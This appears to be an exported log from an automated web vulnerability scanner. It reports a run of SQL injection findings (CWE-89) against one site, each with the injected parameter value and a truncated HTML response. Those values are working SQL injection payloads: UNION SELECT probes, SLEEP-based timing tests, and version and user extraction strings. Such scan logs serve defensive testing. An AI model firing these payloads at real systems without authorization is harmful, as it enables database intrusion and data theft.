href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1363\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 1=0 AND '%'='\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1364\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\nDemoUser1\n#UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30\n#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>\nDeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=\ndevice-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps/\nhead/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\"> \nwindow.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER__\"; </script> <!-- Start \nof Zendesk Widget script --> <!-- <script id=\"ze-snippet\" src=\"https://\nstatic.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> \n</script> --> <!-- End of Zendesk Widget script --> <!-- Bootstrap CSS --> <\nlink rel=\"shortcut icon\" type=\"image/png\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbW\nFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgAQIo\nqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary hints\non your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1365\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# 1*56\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessaryhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1366\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# \" or \"\"&\"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1367\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),4\n#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1368\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1369\nScan SQL InjectionSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)\n+CHAR(88)+CHAR(88)))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1370\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1371\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 2#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1372\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# or SLEEP(5)#ResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1373\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# &&SLEEP(5)\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1374Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# admin' #\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1375\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# @@variable\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/png\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1376\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(\n88)))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1377\nScan SQL Injection\nSeverity ERROR\nEndpoint 